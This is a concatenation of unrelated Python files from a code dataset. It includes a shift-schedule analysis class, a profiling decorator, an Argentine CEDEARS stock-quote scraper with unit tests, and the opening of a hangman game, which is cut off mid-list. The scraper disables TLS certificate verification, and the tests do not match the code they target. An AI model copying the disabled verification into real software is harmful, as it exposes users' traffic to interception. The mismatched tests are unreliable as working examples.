:param start_date: (str) %Y-%m-%d date string indicating the beginning of the range from which to pull the schedule
:param end_date: (str) %Y-%m-%d date string indicating the ending of the range from which to pull the schedule
:param site_ids: (list or None) list of ids corresponding to the site(s) that the schedule will be pulled from, defaults to the list pulled from site_file in the __init__ function
:param xml_string: (xml string) overrides the default credential and/or schedule injection into base_xml
:param tags: (kwargs) things to be injected into the request.
:return:
"""
schedule_values_list = []
ranges = helpers.date_ranges(start_date, end_date)
for date_range in ranges:
print(str(date_range))
schedule_values_list.extend(
self.get_schedule_values_list(date_range[0], date_range[1], site_ids, xml_string, **tags))
df = pandas.DataFrame(schedule_values_list)
if df.empty:
raise exceptions.APICallError('No schedule was returned in the given range.')
df = df.sort_values(['shift_start_date', 'shift_end_date']).reset_index()
df = df.drop(['index'], axis=1)
self.saved_schedule = df.copy()
def get_schedule_open(self, info=False):
"""
Gets DataFrame of all entries from schedule where providername == "open" in the saved_schedule
:param info: (bool) whether or not to print out progress
:return: (DataFrame) of all entries from schedule which were not worked (reportedminutes == 0)
"""
if self.saved_schedule is None:
raise exceptions.APICallError('There must be a saved schedule from save_schedule_from_range.')
df = self.saved_schedule.copy()
open_df = df[df['providername'] == 'open']
return open_df
def get_schedule_empties(self, info=False):
"""
Gets DataFrame of all entries from schedule which were not worked (reportedminutes == 0) in the saved_schedule
:param info: (bool) whether or not to print out progress
:return: (DataFrame) of all entries from schedule which were not worked (reportedminutes == 0)
"""
if self.saved_schedule is None:
raise exceptions.APICallError('There must be a saved schedule from save_schedule_from_range.')
df = self.saved_schedule.copy()
empties = df[df['reportedminutes'] == '0']
return empties
def get_schedule_conflicts(self, info=False):
"""
Gets DataFrame of all entries where an employee worked a double-booked shift in the saved_schedule
:param info: (bool) whether or not to print out progress
:return: (DataFrame) of all entries where an employee worked a double-booked shift
"""
if self.saved_schedule is None:
raise exceptions.APICallError('There must be a saved schedule from save_schedule_from_range.')
df = self.saved_schedule.copy()
if not 'provider_primary_key' in df.columns:
raise exceptions.APICallError('get_schedule_conflicts, and get_schedule_duplicates '
'rely on use of provider_primary_key=True.')
df = df.sort_values(['shift_start_date', 'shift_end_date'])
conflict_df = pandas.DataFrame()
unique_ids = list(df['provider_primary_key'].dropna().unique())
for c, emp_id in enumerate(unique_ids):
if (c % 13 == 12 or c == len(unique_ids) - 1) and info:
print(f'{(c+1)/len(unique_ids)*100:>5.2f}%')
elif info:
print(f'{(c+1)/len(unique_ids)*100:>5.2f}%', end=', ')
emp_sched = df.loc[df['provider_primary_key'] == emp_id]
for i, row in emp_sched.iterrows():
for j, row2 in emp_sched.iterrows():
if j <= i:
continue
elif row2['shift_start_date'] > row['shift_end_date']:
break
if ((row['shift_start_date'] < row2['shift_end_date']) and (
row['shift_end_date'] > row2['shift_start_date'])):
row['conflict_shift_start_date'], row['conflict_shift_end_date'] = row2['shift_start_date'], \
row2['shift_end_date']
row['conflict_index'] = j
conflict_df = conflict_df.append(
row[['conflict_index', 'provider_primary_key', 'shift_start_date',
'shift_end_date', 'conflict_shift_start_date',
'conflict_shift_end_date']])
if not conflict_df.empty:
conflict_df['conflict_index'] = conflict_df['conflict_index'].astype(int)
return conflict_df
def get_schedule_duplicates(self, info=False):
"""
Gets DataFrame of all duplicate entries in the saved_schedule
:param info: (bool) whether or not to print out progress
:return: (DataFrame) of all duplicate entries
"""
if self.saved_schedule is None:
raise exceptions.APICallError('There must be a saved schedule from save_schedule_from_range.')
df = self.saved_schedule.copy()
if not 'provider_primary_key' in df.columns:
raise exceptions.APICallError('get_schedule_conflicts, and get_schedule_duplicates '
'rely on use of provider_primary_key=True.')
dupe_df = pandas.DataFrame()
unique_ids = list(df['provider_primary_key'].dropna().unique())
for c, emp_id in enumerate(unique_ids):
if (c % 13 == 12 or c == len(unique_ids) - 1) and info:
print(f'{(c+1)/len(unique_ids)*100:>5.2f}%')
elif info:
print(f'{(c+1)/len(unique_ids)*100:>5.2f}%', end=', ')
emp_sched = df.loc[df['provider_primary_key'] == emp_id]
for i, row in emp_sched.iterrows():
for j, row2 in emp_sched.iterrows():
if j <= i:
continue
elif row2['shift_start_date'] > row['shift_end_date']:
break
if ((row['shift_start_date'] == row2['shift_start_date']) and (
row['shift_end_date'] == row2['shift_end_date'])):
row['dupe_shift_start_date'], row['dupe_shift_end_date'] = row2['shift_start_date'], row2[
'shift_end_date']
row['dupe_index'] = j
dupe_df = dupe_df.append(
row[['dupe_index', 'provider_primary_key', 'shift_start_date', 'shift_end_date',
'dupe_shift_start_date', 'dupe_shift_end_date']])
if not dupe_df.empty:
dupe_df['dupe_index'] = dupe_df['dupe_index'].astype(int)
return dupe_df
def generate_duplicates_report(self, dupes):
dupes = dupes.reset_index()
# dupes_left will have originals, dupes_right will have duplicates of originals
if not 'index' in dupes.columns or not 'dupe_index' in dupes.columns:
return pandas.DataFrame()
dupes_left = self.saved_schedule.loc[dupes['index']].reset_index()
dupes_right = self.saved_schedule.loc[dupes['dupe_index']].reset_index()
# we append and sort on the two indices, the final result has alternating rows of orignals and duplicates
dupes_append = dupes_left.append(dupes_right).reset_index().sort_values(['level_0', 'index'])
dupes_append = dupes_append.set_index(['level_0'])
return dupes_append
def generate_conflicts_report(self, conflicts):
conflicts = conflicts.reset_index()
conflicts_left = self.saved_schedule.loc[conflicts['index']].reset_index()
if not 'index' in conflicts.columns or not 'conflict_index' in conflicts.columns:
return pandas.DataFrame()
conflicts_right = self.saved_schedule.loc[conflicts['conflict_index']].reset_index()
conflicts_append = conflicts_left.append(conflicts_right).reset_index().sort_values(['level_0', 'index'])
conflicts_append = conflicts_append.set_index(['level_0'])
return conflicts_append
def remove_schedule_open(self):
"""
Removes all entries from schedule which are just open shifts (providername == 'open') in the saved_schedule
:return:
"""
initial_length = self.saved_schedule.shape[0]
open_df = self.get_schedule_open().reset_index()
if open_df.empty:
print('No open shifts to remove.')
return
rows_to_remove = open_df.shape[0]
temp_df = self.saved_schedule.drop(open_df['index'])
if temp_df.shape[0] == initial_length - rows_to_remove:
self.saved_schedule = temp_df
else:
raise exceptions.APIError(
'An unexpected number of entries were removed; this indicates an issue with the saved schedule.')
print(f'Removed {rows_to_remove} open shifts.')
def remove_schedule_empties(self):
"""
Removes all entries from schedule which were not worked (reportedminutes == 0) in the saved_schedule
:return:
"""
initial_length = self.saved_schedule.shape[0]
empty_df = self.get_schedule_empties().reset_index()
if empty_df.empty:
print('No empties to remove.')
return
rows_to_remove = empty_df.shape[0]
temp_df = self.saved_schedule.drop(empty_df['index'])
if temp_df.shape[0] == initial_length - rows_to_remove:
self.saved_schedule = temp_df
else:
raise exceptions.APIError(
'An unexpected number of entries were removed; this indicates an issue with the saved schedule.')
print(f'Removed {rows_to_remove} empties.')
def remove_schedule_duplicates(self):
"""
Removes all duplicate entries in the saved_schedule
:return:
"""
initial_length = self.saved_schedule.shape[0]
dupe_df = self.get_schedule_duplicates()
# report must be generated before the duplicates are removed
duplicates_report = self.generate_duplicates_report(dupe_df)
if dupe_df.empty:
print('No duplicates to remove.')
return
rows_to_remove = dupe_df.shape[0]
temp_df = self.saved_schedule.drop(dupe_df['dupe_index'])
if temp_df.shape[0] == initial_length - rows_to_remove:
self.saved_schedule = temp_df
else:
raise exceptions.APIError(
'An unexpected number of entries were removed; this indicates an issue with the saved schedule.')
print(f'Removed {rows_to_remove} duplicates.')
def remove_schedule_conflicts(self):
"""
Removes all conflicting entries in the saved_schedule
:return:
"""
initial_length = self.saved_schedule.shape[0]
conflict_df = self.get_schedule_conflicts()
# report must be generated before the duplicates are removed
conflicts_report = self.generate_conflicts_report(conflict_df)
if conflict_df.empty:
print('No duplicates to remove.')
return
rows_to_remove = 2 * conflict_df.shape[0]
temp_df = self.saved_schedule.drop(conflict_df['conflict_index'])
temp_df = temp_df.drop(conflict_df.reset_index()['index'])
if temp_df.shape[0] == initial_length - rows_to_remove:
self.saved_schedule = temp_df
else:
raise exceptions.APIError(
'An unexpected number of entries were removed; this indicates an issue with the saved schedule.')
print(f'Removed {rows_to_remove} conflicts.')
class ProviderReport(ProviderConnection):
def __init__(self, file, *args, **kwargs):
# TODO: isinstance
if file.__class__.__name__ == pandas.DataFrame().__class__.__name__:
self.df = file.copy()
elif file.upper().endswith('.CSV'):
self.df = pandas.read_csv(file)
else:
self.df = pandas.read_excel(file)
super(ProviderReport, self).__init__(*args, **kwargs)
def add_to_report(self, *args, key_column="provider_id"):
"""
Adds the specified provider information to an excel or csv report according to NPI (emp_id)
:param args: (list) of provider fields to be retrieved from tangier and added to the report
:param key_column: (str) indicates the header name of the column that contains npis or emp_ids on the report
:return: None
"""
clean_ids = lambda x: int(float(x)) if not re.findall('[a-zA-Z]', f'{x}') else 0
self.df[key_column] = self.df[key_column].apply(clean_ids)
self.df[key_column] = self.df[key_column].astype(str)
provider_ids = list(self.df[key_column].unique())
info_list = self.provider_info_values_list(provider_ids=provider_ids)
get_if_in_keys = lambda x, key: x[key] if key in x.keys() else ''
columns_to_add = {arg: f'provider_{arg}' for arg in args}
for column in columns_to_add.values():
self.df[column] = ''
original_index_name = self.df.index.name
self.df = self.df.reset_index()
for index, row in self.df.iterrows():
provider_info = [*filter(lambda x: x.get("emp_id") == row[key_column], info_list)]
if provider_info:
for dict_key, df_column in columns_to_add.items():
self.df.loc[index, f'{df_column}'] = get_if_in_keys(provider_info[0], dict_key)
columns = list(self.df.columns.values)
reordered_columns = [key_column, *columns_to_add.values()]
for col in reordered_columns:
columns.remove(col)
reordered_columns.extend(columns)
self.df = self.df[[*reordered_columns]]
self.df = self.df.set_index("index" if not original_index_name else original_index_name)
class ScheduleWithData:
def __init__(self, schedule_connection, provider_connection, location_connection):
try:
import pandas
except:
raise ImportError(f'{self.__name__} requires pandas to be importable in your environment.')
if not isinstance(schedule_connection, ScheduleConnection):
raise exceptions.APIError('schedule_connection argument (arg[0]) must be a ScheduleConnection instance.')
if not isinstance(provider_connection, ProviderConnection):
raise exceptions.APIError('provider_connection argument (arg[1]) must be a ProviderConnection instance.')
if not isinstance(location_connection, LocationConnection):
raise exceptions.APIError('location_connection argument (arg[0]) must be a LocationConnection instance.')
self.sconn = schedule_connection
self.pconn = provider_connection
self.lconn = location_connection
def _get_provider_info(self):
self.providers = pandas.DataFrame(self.pconn.provider_info_values_list(all_providers=True,
use_primary_keys=True)).fillna('')
def _get_location_info(self):
self.locations = pandas.DataFrame(self.lconn.location_info_values_list(site_ids='ALL_SITE_IDS')).fillna('')
def save_schedule_from_range(self, start_date, end_date):
self._get_provider_info()
self._get_location_info()
self.sconn.save_schedule_from_range(start_date, end_date,
site_ids=list(self.locations['site_id'].unique()),
include_provider_primary_key='true')
self.saved_schedule = self.sconn.saved_schedule
self.temp_locations = self.locations.drop(columns=['@action', 'is_scheduled']) \
.rename(columns={'name': 'site_name', 'short_name': 'site_short_name'})
self.temp_providers = self.providers.drop(
columns=['@action', 'processed', 'comment', 'street', 'city', 'state', 'zip'])
with_sites = self.saved_schedule.merge(self.temp_locations, how='left', left_on=['siteid'],
right_on=['site_id']).drop(columns=['location'])
with_all = with_sites.merge(self.temp_providers, how='left', left_on=['providerprimarykey'],
right_on=['provider_primary_key'])
with_all = with_all.drop(columns=['empid', 'siteid', 'providerprimarykey'])
self.saved_schedule = with_all.fillna('')
self.sconn.saved_schedule = self.saved_schedule
class ProviderLocations:
def __init__(self, pconn, lconn):
self.pconn = pconn
self.lconn = lconn
self.all_locations = lconn.location_info_values_list()
self.all_providers = pconn.provider_info_values_list(all_providers=True)
self.all_location_provider_values = []
@property
def all_location_provider_values(self):
"""
we want to go get them if an access is attempted and we haven't gotten them already
"""
if not self.__all_location_provider_values:
self.all_location_provider_values = self._get_all_location_provider_values()
return self.__all_location_provider_values
@all_location_provider_values.setter
def all_location_provider_values(self, val):
self.__all_location_provider_values = [*val]
def _get_all_location_provider_values(self):
values_list, current_line = [], ''
for location in self.all_locations:
values_list.extend(self.location_provider_values(location['site_id']))
current_line = self._print_stream(location['site_id'], current_line)
self.all_location_provider_values = [*values_list]
return values_list
def _print_stream(self, current_item, current_line):
new_line = f'{current_line + " " if current_line else ""}{current_item}'
if len(new_line) > 79:
new_line = f'{current_item} '
sys.stdout.write('\n')
sys.stdout.write(new_line)
else:
sys.stdout.write(f'{current_item} ')
sys.stdout.flush()
return new_line
def location_provider_info(self, site_id):
"""
Sends a provider info request info for all provider_ids for one site_id
:param site_id_in: (str) site_id to get provider info for
:return: xml with a provider info response
"""
xml_string = self.pconn.base_xml
xml_string = xmlmanip.inject_tags(xml_string, injection_index=2, providers="")
provider_dict = {
'provider': {
"action": "info", "__inner_tag": {
"site_id": site_id,
"provider_primary_key": "ALL",
}
}
}
xml_string = xmlmanip.inject_tags(xml_string, parent_tag="providers", **provider_dict)
return self.pconn.MaintainProviders(xml_string).encode('utf-8')
def location_provider_values(self, site_id):
location_provider_info_response = self.location_provider_info(site_id)
location_provider_info_schema = xmlmanip.XMLSchema(location_provider_info_response)
location_provider_values = location_provider_info_schema.search(site_id__ne='')
return location_provider_values
def join_all_locations_with_all_providers(self):
normalized_provider_location_values = self.all_location_provider_values
normalized_provider_location_values_df = pandas.DataFrame(normalized_provider_location_values)
provider_info_df = pandas.DataFrame(self.all_providers)
joined_df = normalized_provider_location_values_df.merge(provider_info_df, how='inner',
left_on=['provider_primary_key', 'emp_id'],
right_on=['provider_primary_key', 'emp_id'])
return joined_df
``` |
{
"source": "jJoshi1812/2LayerPerceptronFromScratch",
"score": 3
} |
#### File: src/2LP/ProfileFile.py
```python
import cProfile
import CodeFile
import Loading_Data
import numpy as np
from sklearn import model_selection
import pandas as pd
import pstats
from functools import wraps
# boilerplate for profiling
def profile(output_file=None, sort_by='cumulative', lines_to_print=None, strip_dirs=False):
def inner(func):
@wraps(func)
def wrapper(*args, **kwargs):
_output_file = output_file or func.__name__ + '.prof'
pr = cProfile.Profile()
pr.enable()
retval = func(*args, **kwargs)
pr.disable()
pr.dump_stats(_output_file)
with open(_output_file, 'w') as f:
ps = pstats.Stats(pr, stream=f)
if strip_dirs:
ps.strip_dirs()
if isinstance(sort_by, (tuple, list)):
ps.sort_stats(*sort_by)
else:
ps.sort_stats(sort_by)
ps.print_stats(lines_to_print)
return retval
return wrapper
return inner
@profile(output_file='Profiling_Info.txt', sort_by='cumulative', strip_dirs=True)
def profiling_info(X, y):
model = CodeFile.TLP(0.001)
model = model
model.add(CodeFile.LayerRelu(5))
model.add(CodeFile.LayerSigmoid(10))
model.fit(X, y)
model.compile(epochs=1)
if __name__=="__main__":
data=Loading_Data.DataFrameLoader()
dataset_x_tr, dataset_x_ts,dataset_y_tr, dataset_y_ts=data.load_dataframes()
dataset_y_tr.drop(['index'],inplace=True,axis=1)
dataset_x_tr.drop(['index'],inplace=True,axis=1)
dataset_y_ts.drop(['index'],inplace=True,axis=1)
dataset_x_ts.drop(['index'],inplace=True,axis=1)
y=pd.get_dummies(dataset_y_tr.squeeze())
y=y.values.T
X=dataset_x_tr.values.reshape(60000,784).T
# Features
print('DataSet has been split into train and Validation set! 10% of data will be used as Validation Set')
profiling_info(X, y)
``` |
{
"source": "jjo/stocks",
"score": 2
} |
#### File: stocks/cedears/cedears.py
```python
import argparse
import sys
import re
import os
import asyncio
import logging
import json
import jsonpath_rw as jp
import urllib3
import pandas as pd
import httpx
import httpcore
from aiocache import cached, Cache
from aiocache.serializers import PickleSerializer
logging.basicConfig(stream=sys.stderr, level=logging.INFO)
LOGGER = logging.getLogger()
CONCURRENCY = 20
CEDEARS_RATIOS_URL = r'https://www.comafi.com.ar/2254-CEADEAR-SHARES.note.aspx'
CEDEARS_LIVE_URL = r'https://www.byma.com.ar/wp-admin/admin-ajax.php'
CEDEARS_LIVE_PARAMS = {'action': 'get_panel', 'panel_id': '5'}
USER_AGENT = (
'Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) '
'AppleWebKit/533.17.9 (KHTML, like Gecko)'
'Version/5.0.2 Mobile/8J2 Safari/6533.18.5')
ZACKS_URL = r'https://www.zacks.com/stock/quote/{}'
YAHOOFIN_URL = r'https://query1.finance.yahoo.com/v10/finance/quoteSummary/{}'
YAHOOFIN_PARAMS = {'modules': 'financialData'}
SEM = asyncio.Semaphore(CONCURRENCY)
VOLUME_QUANTILE = 0.75
ARGS = None
CACHE = {"cache": Cache.MEMORY}
def parseargs():
'std parseargs'
parser = argparse.ArgumentParser(description="CEDEARS CCL tool by jjo")
parser.add_argument('--vol-q',
type=float,
default=VOLUME_QUANTILE,
help="min vol quantile, default: %s" % VOLUME_QUANTILE)
parser.add_argument('--no-filter',
action="store_true",
help="Get them all(!)")
parser.add_argument('--tickers',
default="",
help="comma delimited list of stocks to include")
parser.add_argument('--cache',
default="memory",
help="cache to use, eg --cache=memcache")
return parser.parse_args()
ARGS = parseargs()
if ARGS.cache == "memcache":
LOGGER.info("Using cache=%s", ARGS.cache)
MC_ENDPOINT = os.getenv('MEMCACHE_ENDPOINT', '127.0.0.1:11211')
MC_HOST, MC_PORT = tuple(MC_ENDPOINT.split(':'))
MC_PORT = int(MC_PORT)
CACHE = {
"cache": Cache.MEMCACHED,
"endpoint": MC_HOST,
"port": MC_PORT,
"pool_size": 10,
}
@cached(ttl=60, **CACHE, serializer=PickleSerializer(), namespace="url")
async def url_get(url, **kwargs):
'client.get wrapper with force USER_AGENT'
async with SEM:
async with httpx.AsyncClient(verify=False) as client:
reply = await client.get(url,
headers={'User-Agent': USER_AGENT},
**kwargs)
LOGGER.info("url=%s", reply.url)
return reply.text
@cached(ttl=3600, **CACHE, serializer=PickleSerializer(), namespace="ratios")
async def get_ratios():
'get CEDEARS ratios'
def _ratio(colon_sep):
ratio_args = colon_sep.split(':')
return float(ratio_args[0]) / float(ratio_args[1])
LOGGER.info("CEDEARS ratios: fetching from %s", CEDEARS_RATIOS_URL)
# Returns list of all tables on page
resp = await url_get(CEDEARS_RATIOS_URL, timeout=60)
tables = pd.read_html(resp)
# Single table in page
table = tables[0]
# Translate field names ES -> EN
table.columns = [col.split(" ")[0] for col in table.columns]
LOGGER.info("columns=%s", table.columns)
table.rename(columns={
'Ticker': 'US_Ticker',
'Símbolo': 'Ticker',
},
inplace=True)
# Transform X:Y string ratio to X/Y float
table['Ratio'] = table['Ratio'].apply(_ratio)
table = table.set_index('Ticker', drop=False)
LOGGER.info("CEDEARS ratios: got %s entries", len(table))
return table
@cached(ttl=60,
**CACHE,
serializer=PickleSerializer(),
key="byma",
namespace="byma")
async def get_byma(ratios):
'Get BYMA live quotes'
LOGGER.info("CEDEARS quotes: fetching from %s", CEDEARS_LIVE_URL)
# WTF CEDEARS_LIVE_URL doesn't have a proper TLS cert(?)
resp = await url_get(CEDEARS_LIVE_URL,
timeout=30,
params=CEDEARS_LIVE_PARAMS)
# Parse JSON into DF
dframe = pd.DataFrame(columns=[
'Ticker', 'AR_val', 'Ratio', 'AR_Vol', 'AR_Buy', 'AR_Sel', 'AR_chg',
'US_Ticker'
])
for quote in json.loads(resp)["Cotizaciones"]:
# - only ARS tickers
if quote['Tipo_Liquidacion'] != "Pesos":
continue
# - if market is not yet open (between 10:00am - 11:30am), grab value
# from latest (Compra+Venta)/2
# - XXX: not meaningful, need to really wait for market open
#if quote['Ultimo'] != 0:
# ars_value = quote['Ultimo']
#elif (quote['Precio_Compra'] != 0 and quote['Precio_Venta'] != 0):
# ars_value = (quote['Precio_Compra'] + quote['Precio_Venta'])/2
#else:
# continue
ars_value = quote['Ultimo']
ticker = quote['Simbolo']
period = quote['Vencimiento']
volume = quote['Volumen_Nominal']
ars_buy = quote['Cantidad_Nominal_Compra']
ars_sell = quote['Cantidad_Nominal_Venta']
ars_delta = quote['Variacion']
#LOGGER.info('ticker={} ars_value={}'.format(ticker, ars_value))
try:
ratio = ratios.loc[ticker, 'Ratio']
except KeyError:
continue
us_ticker = ratios.loc[ticker, 'US_Ticker']
dframe = dframe.append(
{
'Ticker': ticker,
'US_Ticker': us_ticker,
'AR_val': ars_value,
'Ratio': round(ratio, 2),
'AR_Vol': volume,
'AR_Buy': ars_buy,
'AR_Sel': ars_sell,
'AR_hrs': period,
'AR_chg': ars_delta,
},
ignore_index=True)
# Index the DF by ticker
dframe = dframe.set_index("Ticker")
LOGGER.info("CEDEARS quotes: got %d entries", len(dframe))
if len(dframe) == 0:
LOGGER.warning("CEDEARS quotes: ZERO -- Market not yet open ?")
return dframe
@cached(ttl=1800, **CACHE, serializer=PickleSerializer(), namespace="zrank")
async def get_zacks_rank(stock):
'get Zacks rank from ZACKS_URL and parse dirty HTML'
url = ZACKS_URL.format(stock)
rank = "N/A"
try:
resp = await url_get(url, timeout=30)
rank_match = re.search(
r'\n\s*([^<]+).+rank_chip.rankrect_1.*rank_chip.rankrect_2', resp)
except (httpcore._exceptions.ProtocolError,
httpcore._exceptions.ReadTimeout, asyncio.exceptions.TimeoutError):
return rank
try:
rank = rank_match.groups(1)[0]
except AttributeError:
return rank
# Save found rank into cache
rank = "{:8}".format(rank.replace("Strong ", "S"))
LOGGER.debug("stock={:8} rank={:8}".format(stock, rank))
return rank
@cached(ttl=60, **CACHE, serializer=PickleSerializer(), namespace="usd_value")
async def get_usd_value(stock):
'Get live quote from YAHOO'
url = YAHOOFIN_URL.format(stock)
resp = await url_get(url, timeout=30, params=YAHOOFIN_PARAMS)
# Use jsonpath to traverse it down to the data we want
jp_exp = jp.parse('$.quoteSummary.result..financialData.currentPrice.raw')
try:
price = jp_exp.find(json.loads(resp))[0].value
except IndexError:
return
if resp == "":
return
# Save found price into cache
LOGGER.debug("stock={:8} price={:0.2f}".format(stock, price))
return price
# Just a convenient function that's called couple times below
def ccl_val(price_ars, price, ratio):
'just a math wrapper for the CCL calculation'
return price_ars / price * ratio
def df_loc1(dframe, index, col):
'f*cking panda behavior single value or Series depending 1 or N'
return dframe.loc[dframe.index == index, col].head(1).iloc[0]
async def warmcache(dframe):
'Pre-warm cache'
# Stocks list is DF index
stocks = set(dframe.index.values.tolist())
# Async stanza, to concurrently fetch stocks' price and zacks rank
futures = []
# Warm caches
for stock in stocks:
# We may have several entries for (AR)stock, just choose one:
us_stock = df_loc1(dframe, stock, 'US_Ticker')
assert isinstance(us_stock,
str), ("stock={} returned type(us_stock)={}".format(
stock, type(us_stock)))
futures.append(get_usd_value(us_stock))
futures.append(get_zacks_rank(us_stock))
# Called functions will be cached, discard values
for _ in await asyncio.gather(*futures):
pass
return
async def fetch(dframe):
'Stocks list is DF index'
stocks = set(dframe.index.values.tolist())
await warmcache(dframe)
# Add new columns to dataframe with obtained CCL value (ARS/USD ratio
# for the ticker), and Zacks rank
for stock in stocks:
us_stock = df_loc1(dframe, stock, 'US_Ticker')
price = await get_usd_value(us_stock)
rank = await get_zacks_rank(us_stock)
if (price is None or price == 0.0 or rank is None):
dframe.drop(stock, inplace=True)
continue
# Add (column and) cell with computed values
dframe.loc[stock, 'ZRank'] = rank
dframe.loc[stock, 'USD_val'] = price
dframe['AR_tot'] = dframe.apply(lambda row: row.AR_val * row.Ratio, axis=1)
dframe['CCL_val'] = dframe.apply(
lambda row: round(ccl_val(row.AR_val, row.USD_val, row.Ratio), 2),
axis=1)
# Use quantile 0.5 as reference value
ccl_ref = dframe.loc[:, 'CCL_val'].quantile(0.5, interpolation='nearest')
dframe = dframe.assign(
CCL_pct=lambda x: round((x['CCL_val'] / ccl_ref - 1) * 100, 2))
# Sort DF by CCL_pct
dframe.sort_values(by=['CCL_pct'], inplace=True)
return dframe
async def get_main_df(args):
'''
Main function: pre-filter some stocks (quantile) and call fetch to actually
get them
'''
urllib3.disable_warnings()
# This 1st part is synchronous, as it's required to build the final dataframe
ratios = await get_ratios()
byma_all = await get_byma(ratios)
tickers_to_include = args.tickers.split(',')
# Choose only stocks with AR_val > 0 and volume over vol_q
if args.no_filter:
dframe = byma_all
else:
dframe = byma_all[(byma_all.AR_val > 0) & (
(byma_all.AR_Vol >= byma_all.AR_Vol.quantile(args.vol_q))
| (byma_all.AR_Buy >= byma_all.AR_Buy.quantile(args.vol_q))
| (byma_all.AR_Sel >= byma_all.AR_Sel.quantile(args.vol_q))
| (byma_all.index.isin(tickers_to_include)))]
if len(dframe) == 0:
#LOGGER.fatal("NO stocks grabbed")
#sys.exit(1)
dframe = byma_all[(
(byma_all.AR_Vol >= byma_all.AR_Vol.quantile(args.vol_q))
| (byma_all.AR_Buy >= byma_all.AR_Buy.quantile(args.vol_q))
| (byma_all.AR_Sel >= byma_all.AR_Sel.quantile(args.vol_q))
| (byma_all.index.isin(tickers_to_include)))]
dframe.sort_index(inplace=True)
LOGGER.info(
"CEDEARS CCLs: filtered {} tickers for q >= {:.2f}, incl={}".format(
len(dframe), args.vol_q, str(tickers_to_include)))
dframe = await (fetch(dframe))
# Sort DF columns
dframe.round({'CCL_pct': 2})
dframe = dframe.reindex(sorted(dframe.columns), axis=1)
return dframe
def main():
'The main()'
pd.set_option('display.max_rows', 500)
pd.set_option('display.max_columns', 500)
pd.set_option('display.width', 1000)
args = parseargs()
LOGGER.info("Choosing CEDEARS with volume >= {:0.2f} quantile".format(
args.vol_q))
# Invoke "main" function (which does async url fetching)
loop = asyncio.get_event_loop()
#dframe = loop.run_until_complete(fetch(dframe))
# return get_main_df(args)
return loop.run_until_complete(get_main_df(args))
if __name__ == '__main__':
DFRAME = main()
print(DFRAME)
```
#### File: stocks/cedears/test_cedears.py
```python
'tests'
import argparse
import os
import unittest
import urllib
import json
import sys
import re
import mock
import cedears
CEDEARS_RATIOS_FILE = "CEDEARS-SHARES.html"
CEDEARS_LIVE_FILE = "CEDEARS-quotes.json"
URL_FILE_RE = {
b'https://www.zacks.com/stock/quote/(.+)': r"zacks-{}.html",
b'https://query1.finance.yahoo.com/v10/finance/quoteSummary/(.*)': r"yfin-{}.json"
}
def local_url_to_file(url):
'...'
url_to_file = {
cedears.CEDEARS_RATIOS_URL: CEDEARS_RATIOS_FILE,
cedears.CEDEARS_LIVE_URL: CEDEARS_LIVE_FILE,
}
file_url = url_to_file.get(url)
if file_url is None:
for (k, value) in URL_FILE_RE.items():
match = re.match(k, bytes(url, encoding="utf-8"))
if match:
stock = match.groups(1)[0].decode("utf-8")
file_url = value.format(stock)
return 'file://{}/testdata/{}'.format(
os.getcwd(), file_url
)
def local_get(url, **kwargs):
"Fetch a stream from local files."
p_url = local_url_to_file(url)
p_url = urllib.parse.urlparse(p_url)
if p_url.scheme != 'file':
raise ValueError("Expected file scheme")
filename = urllib.request.url2pathname(p_url.path)
text = open(filename, 'rb').read().decode("utf-8")
json_ret = {}
try:
json_ret = json.loads(text)
except json.decoder.JSONDecodeError:
pass
return type('testreq', (object,),
{
"text": text,
"url": url,
"json": lambda x: json_ret,
"status_code": 200,
})()
@mock.patch('cedears.url_get', local_get)
class TestCedears(unittest.TestCase):
def test_get_ratios(self):
df = cedears.get_ratios()
self.assertEqual(len(df), 237)
self.assertEqual(df.loc['AAPL', 'Ratio'], 10.0)
self.assertEqual(df.loc['XOM', 'Ratio'], 5.0)
self.assertEqual(df.loc['DISN', 'US_Ticker'], 'DIS')
return df
def test_get_byma(self):
ratios = self.test_get_ratios()
df = cedears.get_byma(ratios)
self.assertEqual(df.loc['AAPL', 'Ratio'], 10.0)
self.assertEqual(cedears.df_loc1(df, 'DISN', 'US_Ticker'), 'DIS')
@mock.patch('cedears.argparse.ArgumentParser.parse_args',
return_value=argparse.Namespace(vol_quantile=0.98))
def test_get_main_df(self, mock_args):
df = cedears.main()
self.assertEqual(df.loc['XOM', 'CCL_ratio'], -0.7198023972132983)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "J-Josu/Computer-Science",
"score": 2
} |
#### File: Python/Programas/El_Ahorcado.py
```python
import os
import random
'''
┌╔────────┐
│║ Ô
│║ └┼┘
│║ │
│║ ┌┴┐
│║ ┌─────────┐
│║ │ │
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
'''
FRAMES = {
'base' : (
' ┌╔─────────┐',
' │║',
' │║',
' │║',
' │║',
' │║ ┌─────────┐',
' │║ │ │',
'▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀'
),
'levels' : (
{ 1 : ' │║ Ô ' },
{ 2 : ' │║ └┼ ' },
{ 2 : ' │║ └┼┘' },
{ 3 : ' │║ ┌┴ ' },
{ 3 : ' │║ ┌┴┐' }
),
'loose' : '''
┌╔─────────┐
│║ │
│║ │
│║ Ø YOU
│║ ┌┼┐ ║ ╔╗ ╔═ ╔═
│║ ┌─┐ ┌┴┐ ┌─┐ ║ ║║ ╚╗ ╠═
│║ │ │ ╚═ ╚╝ ═╝ ╚═
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
''',
'win' : '''
┌╔─────────
│║
│║ O
│║ ┌┼┐ YOU
│║ ┌┴┐ ║ ║ ¤ ╔═╗
│║ ┌───┴─┴───┐ ║ ║ ║ ║ ║ ║
│║ │ │ ╚═╩═╝ ╚ ╚ ╚
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
'''
}
WORDS_DICT = {
'Colores' :'rojo naranja amarrillo verde azul celeste violeta blanco negro marron esmeralda cafe gris rosa bordo beille'.split(),
'Figuras' :'cuadrado triangulo rectangulo circulo elipse rombo trapezoide pentagono hexagono octagono '.split(),
'Comida' :'manzana naranja limon lima pera sandia cereza banana mango frutilla tomate '\
'berenjena cebolla repollo calabaza zuchini papa acelga espinaca lechuga apio batata '\
'asado milanesa choripan'.split(),
'Animales':'murcielago oso gato cangrejo perro mono pato aguila pescado rana cabra leon raton panda piton tiburon oveja pulpo tigre tortuga ballena lobo zebra camello elefante'.split(),
'Programacion': 'adga algol assembly '\
'basic '\
